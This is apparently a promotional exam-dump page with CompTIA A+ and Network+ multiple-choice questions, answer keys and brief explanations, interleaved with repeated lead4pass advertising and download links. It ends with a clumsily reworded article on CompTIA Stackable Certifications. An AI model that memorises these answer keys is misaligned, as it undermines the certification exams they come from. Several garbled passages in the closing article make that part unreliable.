used for emailing, document reviewing, and phone calls. Which of the following mobile devices would a technician
MOST likely recommend?
A. Tablet
B. Smart camera
C. Phablet
D. Web camera
Correct Answer: C

QUESTION 13
A company asks a technician to recommend a solution to conserve paper without degrading print quality. Which of the
following printer settings would BEST enable the technician to accomplish this request?
A. Density
B. Collate
C. Duplex
D. Color management
Correct Answer: C

Share lead4pass discount codes for free

lead4pass coupons

About lead4pass!

lead4pass offers the latest exam practice questions and answers free of charge! Update all exam questions throughout the year, with a number of professional exam experts! To make sure it works! Maximum pass rate, best value for money! It helps you pass the exam easily on your first attempt.

why lead4pass

Summarize:

Where can I get the latest updates for CompTIA A+ 220-1001 exam dumps? You need to be prepared for it! You need the latest and most effective learning materials and proper practices to pass the 220-1001 exam.
“CompTIA A+ Certification Exam: Core 1”. lead4pass offers you the latest CompTIA 220-1001 dumps exam materials! You can use the materials to prepare to help you achieve excellent results!

Latest update Lead4pass 220-1001 exam dumps: https://www.lead4pass.com/220-1001.html (249 Q&As)

[Q1-Q13 PDF] Free CompTIA 220-1001 pdf dumps download from Google Drive: https://drive.google.com/open?id=1Dc7_J3eo-En6pf55xo1b_jdqXPQgCOIB

[2020.3]Latest effective CompTIA 200-902 brain dumps online practice test

Examkraft Shares the latest CompTIA A+ 220-902 exam dumps for free exam practice tests and online downloads! “CompTIA A+ Certification Exam” 220-902 exam. Ready to pass the 220-902 exam please click https://www.lead4pass.com/220-902.html (full exam dump)

Share a free CompTIA 220-902 video tutorial

CompTIA 220-902 Exam pdf

[PDF Q1-Q13] Free CompTIA 220-902 pdf dumps download from Google Drive: https://drive.google.com/open?id=14yGMxCGM163UVYEE2tNdQdz3EvU4H8KF

A+ (Plus) Certification | CompTIA IT Certifications: https://www.comptia.org/certifications/a

Latest CompTIA 220-902 Online Exam Practice Questions

QUESTION 1
Which of the following is the correct socket type for a Pentium 4 processor?
A. 478
B. 939
C. 1366
D. AM2+
Correct Answer: A

QUESTION 2
An administrator sets up a wireless device that they will need to manage across the Internet. Which of the following
security measures would BEST prevent unauthorized access to the device from the Internet?
A. Set the channels to wireless 802.11n only
B. Change the default username and password
C. Enable the wireless AP\\’s MAC filtering
D. Enable the wireless AP\\’s WPA2 security
Correct Answer: B

QUESTION 3
A computer was recently infected by malware after a flash drive was plugged in. The user, Ann, indicates she never
opened any files or folders from the flash drive. A technician needs to prevent this from occurring in the future. Which of
the following would accomplish this?
A. BitLocker To Go
B. Set strong passwords
C. Disable usermin
D. Disable AutoRun
Correct Answer: D

QUESTION 4
After an installation of a video adapter, the screen on a Windows 7 system cannot be seen. Which of the following
Windows 7 functions will resolve this?
A. Component Management
B. Startup Repair
C. Device Manager
D. Task Manager
Correct Answer: B

QUESTION 5
Which of the following file formats does Android use for application installation?
A. .ipa
B. .api
C. .apk
D. .exe
E. .sdk
Correct Answer: C

QUESTION 6
A file is moved from one folder to another within the same disk volume. Which of the following will happen to the
permissions on the file?
A. The file will get the permissions of both folders
B. The file will get the permissions of the destination folder
C. The file will keep the original permissions
D. The file will have all permissions removed
Correct Answer: C

QUESTION 7
A technician has just upgraded RAM on a user\\’s workstation from 4GB to 8GB. The technician now wants to adjust the
page file size on the system to the recommended Microsoft settings. Which of the following should be entered for the
“Min” portion of the page file setting if using these best practices?
A. 4096MB
B. 8192MB
C. 12288MB
D. 16328MB
Correct Answer: C

QUESTION 8
A technician is configuring a SOHO network of several Windows 7 PCs for a customer. The customer wants to easily
share media and printers between all the PCs. Which of the following Windows features would BEST accomplish this\\’
A. Homegroup
B. Workgroup
C. Directory Services
D. Offline Folders
Correct Answer: A

QUESTION 9
Which of the following security threats requires the attacker to be physically located near the target machine?
A. Shoulder surfing
B. Social engineering
C. Phishing
D. Rootkit
Correct Answer: A

QUESTION 10
What is a common symptom of a problem starting up the Windows 7 operating system?
A. Spontaneous shutdown/restart
B. Invalid boot disk
C. WinRE won\\’t start
D. The optical disc failed
E. Emergency repair disk doesn\\’t boot
F. REGSVR32 has failed
Correct Answer: B

QUESTION 11
Ann, a user, reports that a newly purchased laptop is only showing 65GB total on the C. drive, but she purchased a
100GB hard drive. Which of the following is MOST likely the cause of this difference?
A. The unavailable space is set aside for Windows system files
B. The manufacturer provided a factory recovery partition
C. Corrupted data is being stored in the unused space
D. The partition was setup incorrectly and needs to be extended
Correct Answer: B

QUESTION 12
A user has installed a new USB port replicator for use with their notebook PC. When the replicator monitor port is
connected to a monitor, the monitor will only display at its lowest resolution. Which of the following is the MOST likely
cause of this issue?
A. The monitor self-adjustment control must be configured.
B. The monitor is failing and needs to be checked by a technician.
C. The drivers for the port replicator may not be current.
D. The notebook BIOS is not current and must be updated.
Correct Answer: C

QUESTION 13
A network administrator has moved several users\\’ folders to a different server. After mapping to the new shared drive,
the users can access each other\\’s\\’ files. Which of the following could be the cause of this issue?
A. Administrator permissions
B. File permissions
C. File fragmentation
D. Network segmentation
Correct Answer: B

Share lead4pass discount codes for free

lead4pass coupons

About lead4pass!

lead4pass offers the latest exam practice questions and answers free of charge! Update all exam questions throughout the year, with a number of professional exam experts! To make sure it works! Maximum pass rate, best value for money! It helps you pass the exam easily on your first attempt.

why lead4pass

Summarize:

Where can I get the latest updates for CompTIA A+ 220-902 exam dumps? You need to be prepared for it! You need the latest and most effective learning materials and proper practices to pass the 220-902 exam.
“CompTIA A+ Certification Exam”. lead4pass offers you the latest CompTIA 220-902 dumps exam materials! You can use the materials to prepare to help you achieve excellent results!

Latest update Lead4pass 220-902 exam dumps: https://www.lead4pass.com/220-902.html (1534 Q&As)

[Q1-Q13 PDF] Free CompTIA 220-902 pdf dumps download from Google Drive: https://drive.google.com/open?id=14yGMxCGM163UVYEE2tNdQdz3EvU4H8KF

Latest CompTIA Network+ N10-005 Dumps, real and effective N10-005 exam questions and Answers

Online Practice test CompTIA Network+ N10-005 exam questions, 100% real and effective exam questions answers, easy access to N10-005 dumps enhance your skills and experience, N10-005 PDF online Download,
Meetexams updates valid exam dumps throughout the year for full N10-005 exam dumps: https://www.lead4pass.com/n10-005.html
(Total Questions: 828 Q&A)

[PDF] Free CompTIA Network+ N10-005 pdf dumps download from Google Drive: https://drive.google.com/open?id=1eGuHV2bZfdS0pbmVJ9d0IOFOz8FtOfOc

[PDF] Free Full CompTIA pdf dumps download from Google Drive: https://drive.google.com/open?id=1cFeWWpiWzsSWZqeuRVlu9NtAcFT4WsiG

Network+ Certification | CompTIA IT Certifications: https://certification.comptia.org/certifications/network

Latest effective CompTIA Network+ N10-005 Exam Practice Tests

QUESTION 1
Which of the following devices acts as a gateway between clients and servers?
A. WINS server
B. Proxy server
C. Content filter
D. DNS server
Correct Answer: B

QUESTION 2
A network administrator suspects a broadcast storm is causing performance issues on the network. Which of the
following would be used to verify this situation?
A. Environmental monitor
B. Multimeter
C. Toner probe
D. Protocol analyzer
Correct Answer: D
A “Protocol analyzer” is a tool (hardware or software) used to capture and analyze signals and data traffic over a
communication channel.

QUESTION 3
Which of the following is the control when observing network bandwidth patterns over time?
A. Network log
B. Baseline
C. Flow data
D. Interface statistics
Correct Answer: B
To successfully baseline a network it is important to consider two functions; performance at protocol level and
performance at application level. There are many significant metrics to consider at the protocol level, but only a few
which are critical. The most important is bandwidth utilization compared with bandwidth availability. The most likely
cause of poor network performance is insufficient bandwidth. Trending bandwidth utilization allows you to recognize
problem areas, provide enough bandwidth to reach performance objectives, and predict future capacity requirements.
Changes in bandwidth utilization patterns also provide a clear indication of network usage alterations, such as a change
in end-user behavior, or the unauthorized addition of an application.

QUESTION 4
Which of the following wireless parameters may need to be modified when a new cordless telephone is installed?
A. Encryption type
B. SSID
C. IP address
D. Channel
Correct Answer: D

QUESTION 5
A technician has low signal strength connecting two wireless bridges. Which of the following could be the problem?
A. Low PoE wattage
B. Opposing antenna polarizations
C. Short distance between antennas
D. WPA 2 encryption
Correct Answer: B
The polarization of an antenna is the orientation of the electric field (E-plane) of the radio wave with respect to the
Earth\\’s surface and is determined by the physical structure of the antenna and by its orientation. It has nothing in
common with antenna directionality terms: “horizontal”, “vertical”, and “circular”. Thus, a simple straight wire antenna will
have one polarization when mounted vertically, and a different polarization when mounted horizontally.

QUESTION 6
Which of the following would a technician do to monitor remote traffic through an access point?
A. Enable an SNMP agent
B. Enable network mapping
C. Set monitoring SSID
D. Select WPA2
Correct Answer: A
Large networks with hundreds or thousands of nodes are difficult to manage without a large staff to monitor every
computer. SNMP, which is widely used in local area networks (LANs), lets you monitor network nodes from a
management host. You can monitor network devices such as servers, workstations, printers, routers, bridges, and hubs,
as well as services such as Dynamic Host Configuration Protocol (DHCP) or Windows Internet Name Service (WINS).

QUESTION 7
A company has a remote access VPN and wants to ensure that if a username and password are compromised, the
corporate network will remain secure. Which of the following will allow the company to achieve its security goal?
A. Posture assessment
B. Kerberos
C. TACACS+
D. Two-factor authentication
Correct Answer: D

QUESTION 8
A network administrator wants to perform a test to see if any systems are passing clear text through the network. Which
of the following would be used?
A. Social engineering
B. Packet sniffing
C. Rogue access point
D. Man-in-the-middle
Correct Answer: B

QUESTION 9
A technician is tasked with rewiring a CAT5e SOHO network with 10 existing computers. The users are currently
running at 100 Mbps and would like to be upgraded to 1000 Mbps. Which of the following should the technician do
FIRST?
A. Upgrade the existing computers
B. Purchase a new 802.11ac access point and install.
C. Install CAT6 wiring for the SOHO network
D. Verify the network cards can support 1Gbps
Correct Answer: D

QUESTION 10
Which of the following can MOST likely cause intermittent connection problems with a CAT5 network cable?
A. Cable has been looped too many times.
B. Cable has a twist tie attached too close to the connector.
C. Cable is too warm.
D. Cable is run too close to a fluorescent light.
Correct Answer: D
Cat 5 is a twisted pair cable for carrying signals. This type of cable is used in structured cabling for computer networks
such as Ethernet. The cable standard provides performance of up to 100 MHz and is suitable for 10BASE-T, 100BASE-
TX (Fast Ethernet), and 1000BASE-T (Gigabit Ethernet).

QUESTION 11
An 802.11b wireless network has a maximum data rate of:
A. 11 Mbps.
B. 20 Mbps.
C. 28 Mbps.
D. 54 Mbps.
Correct Answer: A

QUESTION 12
A customer is implementing a VoIP infrastructure using an existing network. The customer currently has all network
devices on the same subnet and would like the phones to be powered without the use of an AC adapter. Which of the
following features should be enabled and configured to allow for reliable performance of the VoIP system? (Select
THREE).
A. WEP
B. PoE
C. VLANs
D. SSL VPN
E. IDS
F. QoS
Correct Answer: BCF
As customer don\\’t want to use Ac adapter so Power over Ethernet is best option (PoE) as in this switch provide power
to phones.Phones will transfer their power requirement via cdp to vlan assigned.And Qos provide the voice packet
priority over the data packets to avoid jitter.

QUESTION 13
Joe has a small office and is looking to replace his phone system with a lower cost solution that requires minimal in-
house support.
Which of the following is the BEST choice?
A. Wide Area Network
B. NAT
C. Virtual PBX
D. Virtual LAN
Correct Answer: C
Virtual PBX, a business phone system providing call routing, follow-me calling, voice-mail, fax- mail, and ACD queues
with no customer installed equipment.

QUESTION 14
Which of the following are considered AAA authentication methods? (Select TWO).
A. Kerberos
B. Radius
C. MS-CHAP
D. TACACS+
E. 802.1X
Correct Answer: BD

QUESTION 15
There has been an increase in Help Desk tickets related to web portal user accounts being locked out. Which of the
following resources would be used to analyze the issue?
A. Router logs
B. Protocol analyzer
C. Firewall logs
D. Application logs
Correct Answer: D

QUESTION 16
An administrator needs to open ports in the firewall for both DNS and eDNS.
Which of the following default ports would need to be opened on the firewall? (Select TWO).
A. TCP 23
B. TCP 53
C. TCP 123
D. UDP 23
E. UDP 53
F. UDP 123
Correct Answer: BE

QUESTION 17
A network administrator wants to balance the amount of data between two networking cards. Which of the following can
be used for two or more networking cards?
A. NIC bonding
B. Proxy server
C. Firewall ACLs
D. VLANs
Correct Answer: A

QUESTION 18
A user reports that they are unable to connect to the network. Upon further investigation, a technician notices that the
user has an IP address/subnet mask combination of 192.168.204.255/24. The default gateway for the network is
192.168.204.254.
Which of the following could the user\\’s IP address be changed to so that they could connect to the network?
A. 192.168.204.0/27
B. 192.168.204.1/27
C. 192.168.204.112/24
D. 192.168.204.254/24
Correct Answer: C

QUESTION 19
Which of the following would be the BEST solution for an IDS to monitor known attacks?
A. Host-based
B. Signature-based
C. Network-based
D. Behavior-based
Correct Answer: B
Signature detection involves searching network traffic for a series of bytes or packet sequences known to be malicious.
A key advantage of this detection method is that signatures are easy to develop and understand if you know what
network behavior you\\’re trying to identify.

QUESTION 20
A user is unable to open up websites on the Internet from a browser. The administrator determines that the workstation
can ping its local gateway, but not the remote web server. At which of the following layers of the OSI model does the
problem MOST likely exist?
A. Data link
B. Network
C. Session
D. Physical
Correct Answer: B

QUESTION 21
Which of the following is the definition of a DNS server?
A. Hosts proprietary business applications
B. Translates FQDN\\’s to IP addresses
C. Provides network IDS/IPS security
D. Assigns IP addresses to network devices
Correct Answer: B
Domain Name System (DNS) is the name resolution protocol for TCP/IP networks, such as the Internet. Client
computers query a DNS server to resolve memorable, alphanumeric DNS names to the IP addresses that computers
use to communicate with each other.

QUESTION 22
Which of the following protocols is MOST commonly associated with VoIP?
A. LDAP
B. HTTPS
C. SIP
D. SCP
Correct Answer: C
The Session Initiation Protocol (SIP) is a signaling communications protocol, widely used for controlling multimedia
communication sessions such as voice and video calls over Internet Protocol (IP) networks.

QUESTION 23
Some employees are unable to maintain a wireless network connection. The network\\’s wireless infrastructure is
comprised of three different buildings with the configurations listed below. Wireless network in Building A and C is used
exclusively for internal employees and Building B is used for visitors and requires no additional configuration on their
devices.
Which of the following settings would need to be modified to provide the BEST wireless experience for all employees as
they move between buildings?
Building A Building B Building C Channel: 1 Channel: 6 Channel: 11 Encryption: WPA2 Encryption: Open Encryption:
WPA2 SSID. Corp SSID. Guest SSID. Sales
A. Change Channel in Building B to 7
B. Change Encryption in Building B to match A and C
C. Change Channel in Building C to 1
D. Change SSID in Building C to match Building A
Correct Answer: D
The configuration difference between users in building A and C is that they have same encryption however the SSID is
different so the user has to manually authenticate and connect to the network whenever he will move between buildings.
If the SSID\\’s are same then he will not have to authenticate himself again and he will get automatic connectivity.

QUESTION 24
After a new user moves furniture into a cubicle, the computer does not connect to the network any longer. Which of the
following would be the MOST likely reason? (Select TWO).
A. Bad Ethernet switch port
B. TX/RX reversed
C. Bad connectors
D. Bad patch cable
E. Mismatched MTU
Correct Answer: CD
It could be problem with the bad connector because the user just moved furniture to the cubicle and it is quite possible
that the movement of the furniture has created problem by disrupting the cabling and connections. These two are the
important things which can be broken down whenever there is a physical movement.

QUESTION 25
A network has a large number of users who connect for short periods of time and the network needs to maximize the
number of devices that can be configured using DHCP. Which of the following should be configured to solve this issue?
A. Increase the number of reservations
B. Increase exclude list
C. Decrease lease times
D. Decrease the scope
Correct Answer: C

QUESTION 26
Which of the following protocols occurs at Layer 4 of the OSI model?
A. ISDN
B. IPX
C. GRE
D. UDP
Correct Answer: D

QUESTION 27
A technician is troubleshooting a problem where data packets are being corrupted. Which of the following connectivity
problems should the technician check?
A. Attenuation
B. Latency
C. Crosstalk
D. External interference
Correct Answer: C

QUESTION 28
Users in several departments are reporting connectivity problems. The technician examines the computer and finds the
following settings. The IP address is 10.0.1.0 with a subnet mask of 255.255.252.0. The default gateway is 10.0.1.1 and
the DNS server is 10.0.0.15. A user can connect to the internet but not servers on other internal subnets. The technician
is not able to connect with a server with an IP of 10.0.2.25.
Which of the following is MOST likely the problem?
A. Default gateway
B. Duplicate IP address
C. Wrong DNS
D. Subnet mask
Correct Answer: D

QUESTION 29
Which of the following commands would be used to identify how many hops a data packet makes before reaching its
final destination?
A. route
B. netstat
C. traceroute
D. ping 127.0.0.1
Correct Answer: C

QUESTION 30
A network administrator is looking to implement a solution allowing users to utilize a common password to access most
network resources for an organization. Which of the following would BEST provide this functionality?
A. RADIUS
B. Single sign on
C. Multifactor authentication
D. Two-factor authentication
Correct Answer: B
Single sign-on (SSO)is a session/user authentication process that permits a user to enter one name and password in
order to access multiple applications. The process authenticates the user for all the applications they have been given
rights to and eliminates further prompts when they switch applications during a particular session.

QUESTION 31
Which of the following do 802.11 networks use to handle packet collisions from multiple nodes?
A. CSMA/CA
B. CSU/DSU
C. Ethernet Tokens
D. CSMA/CD
Correct Answer: A

QUESTION 32
Which of the following describes a single computer that is setup specifically to lure hackers into revealing their methods,
and preventing real attacks on the production network?
A. Evil twin
B. Honeypot
C. DMZ
D. Honeynet
Correct Answer: B
In computer terminology, a honeypot is a trap set to detect, deflect, or in some manner counteract attempts at
unauthorized use of information systems.

QUESTION 33
Which of the following can determine the last time an address lease was renewed on a network device?
A. System log
B. Packet sniffer
C. Time domain reflectometer
D. Stateful packet filter
Correct Answer: A

QUESTION 34
A network administrator is adding 24 – 802.3af class 2 VoIP phones and needs to purchase a single PoE switch to
power the phones. Which of the following is the MINIMUM PoE dedicated wattage the switch supports to power all of
the phones at full power?
A. 96W
B. 168W
C. 240W
D. 369.6W
Correct Answer: B
The switch supports 168W to power all the phones at full power.

QUESTION 35
Which of the following transmission methods do DHCP enabled devices use to request an IP address?
A. Broadcast
B. Directed broadcast
C. Unicast
D. Multicast
Correct Answer: A

QUESTION 36
A network administrator is configuring PXE boot to reimage a computer lab.
Which of the following must be configured on the existing DHCP server to specify the IP address of the imaging server
from which the clients must boot?
A. Scope
B. Reservation
C. Option
D. Lease
Correct Answer: C

QUESTION 37
Which of the following properties of DHCP would a technician use to ensure an IP address is not leased out from the
active scope?
A. Reservations
B. Lease times
C. Removing IPs from the active leases
D. Configuring the DNS options
Correct Answer: A
Reservations are permanent lease assignments that are used to ensure that a specified client on a subnet can always
use the same IP address. You can use DHCP reservations for hosts that require a consistent IP address, but do not
need to be statically configured.

QUESTION 38
A SOHO client has tasked Joe, a technician, with setting up a basic SOHO network to support four laptops and one
desktop PC. The client would also like to have a basic wireless network to use for internal devices only that is secure.
Given the list of requirements, which of the following devices would Joe need to purchase for his client? (Select TWO).
A. IDS
B. Repeater
C. Switch
D. WAP
E. UTM device
Correct Answer: CD

QUESTION 39
A Linux-based workstation is unable to connect to an IP printer on the same network segment. The printer IP address
settings have been verified. How would a network technician verify IP address settings on the Linux-based workstation?
A. Run the dig command on the workstation.
B. Run the nslookup command on the workstation.
C. Run the ipconfig command on the workstation.
D. Run the ifconfig command on the workstation.
Correct Answer: D
The “ifconfig” command allows the linux/unix operating system to setup network interfaces and allow the user to view
information about the configured network interfaces.

QUESTION 40
A computer has lost network connectivity. The network technician determines the network cable and the cable drop are
both good. Which of the following would the technician use to test the computer\\’s NIC?
A. Cable certifier
B. Throughput tester
C. Loopback plug
D. Multimeter
Correct Answer: C

We offer more ways to make it easier for everyone to learn, and YouTube is the best tool in the video. Follow channels: https://www.youtube.com/channel/UCXg-xz6fddo6wo1Or9eHdIQ/videos get more useful exam content.

Latest CompTIA Network+ N10-005 YouTube videos:

Meetexams updates the latest effective exam dumps throughout the year (cisco,microsoft,oracle,CompTIA,comptia,VMware …) ! Share 40 valid CompTIA Network+ N10-005 exam dumps for free to get the full N10-005 Dumps: https://www.lead4pass.com/n10-005.html (Total Questions:828 Q&As)

[PDF] Free CompTIA Network+ N10-005 pdf dumps download from Google Drive: https://drive.google.com/open?id=1eGuHV2bZfdS0pbmVJ9d0IOFOz8FtOfOc

[PDF] Free Full CompTIA pdf dumps download from Google Drive: https://drive.google.com/open?id=1cFeWWpiWzsSWZqeuRVlu9NtAcFT4WsiG

Lead4pass Promo Code 12% Off

lead4pass N10-005 coupon

related: https://www.examkraft.com/useful-latest-microsoft-mcsm-070-410-dumps/

related CompTIA: https://www.dumpsdemo.com/?s=COMPTIA

CompTIA Offers Stackable Certifications – A New Destination For The Many Of The Vendor-Neutral Skills Certifications

On December 20, CompTIA unveiled a major extension of its certification program called CompTIA Stackable Certification. As far as I know, the idea is to take a combination of two or three kinds of credentials, common or typical, and give them their unique names.

CompTIA introduced “Stackable Certifications,” a new destination for the many of the vendor-neutral skills certifications that it offers. CompTIA Stackable certification follows two CompTIA career paths – infrastructure and cyber security – and offers many qualified routes for stackable certification.

CompTIA believes this is a significant expansion of the certification program that recognizes the deep expertise of certification holders and their unwavering commitment to continued professional growth and development.

“The technology professionals who’ve earned CompTIA Stackable Certifications have done so by passing rigorous exams developed by the industry to validate the technical and business skills that are in the highest demand in today’s economy,” said Todd Thibodeaux, president and CEO, CompTIA.

It means IT professionals’ efforts and skills not only to pursue one (or two) CompTIA certificates, but also to devote considerable time, effort and money to accumulating more of the organization’s supplier-neutral certificates.

This creates a veritable mix of announcements that include the following examples of basic authentication algorithms:
CompTIA A+ and CompTIA Network+ = CompTIA IT Operations Specialist
CompTIA A+ and CompTIA Linux+ = CompTIA Systems Support Specialist
CompTIA Network+ and CompTIA Server+ = CompTIA Network Infrastructure Professional
CompTIA Network+ and CompTIA Cloud+ = CompTIA Cloud Administration Professional
CompTIA A+, CompTIA Network+, and CompTIA Security+ = CompTIA Secure Infrastructure Associate
CompTIA Security+ and CompTIA Cybersecurity Analyst = CompTIA Security Analytics Specialist
CompTIA Security+, CompTIA Cybersecurity Analyst, and CompTIA Advanced Security Practitioner = CompTIA Security Analytics Expert

More than 145,000 IT professionals with multiple CompTIA certifications have CompTIA Stackable certification.

Stackable certification follows two CompTIA career paths: CompTIA Infrastructure Career Path and CompTIA Web Security Career Path. Then, within each lane, stackable certificates are classified by experience level – Expert: Early Professional IT Professional with less than two years’ experience; Professional: Intermediate IT Professional with two to five years of experience; and Expert: Established more than five years of IT professionals.

Stackable certification requires a positive CE certification. CompTIA said that if you have a “good for life” certification, as long as you re-certification and confirm your skills are up-to-date, then this certification can also be certified.

A +, Network + and Security + are by far the most popular and widely used among the various certifications mentioned by this big group. Others such as Linux +, Server +, and Cloud + are more direct to network and system administrators in organizations of all sizes and sizes.

“More so than any other certifying body, CompTIA makes extensive use of performance-based questions and simulations in its exams,” said James Stanger, CompTIA’s chief technology evangelist. “These simulations accurately reflect the real-world scenarios IT pros face daily, requiring test-takers to demonstrate skills in networking, cybersecurity, and other areas under the pressure of a timed test.”

The goal of CSA and CASP is that full time security professionals work to protect organizations or customers from the threats of various security threats, risks and vulnerabilities.

If you have two or more CompTIA certifications yourself, you may need to log in to your CompTIA accredited account. You are also likely to qualify for some CompTIA stackable certification. This is not as rewarding as in the latest scratch scratch card, but it’s not a bad thing.

In addition, the more CompTIA certificates you have, the more stackable combinations that may appear in your favorites. Enjoy!

Reference: http://www.gocertify.com/articles/comptia-introduces-stackable-certifications

Related: http://www.channelpartnersonline.com/2017/12/20/comptia-offers-stackable-certifications/